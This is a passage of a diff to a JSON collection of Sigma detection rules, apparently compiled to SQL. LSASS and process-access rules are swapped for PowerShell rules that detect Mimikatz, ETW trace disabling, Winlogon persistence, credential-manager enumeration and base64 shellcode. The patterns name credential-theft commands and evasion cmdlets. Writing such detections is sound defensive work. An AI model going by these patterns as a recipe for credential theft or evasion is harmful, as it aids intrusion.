Nasreddine Bencherchali (sigma)", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE 
'%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1003" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' 
ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage 
LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" - }, - { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "falsepositives": [ - "False positives are 
present when looking for 0x1410. Exclusions may be required." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate usage of the cmdlet to forward emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' 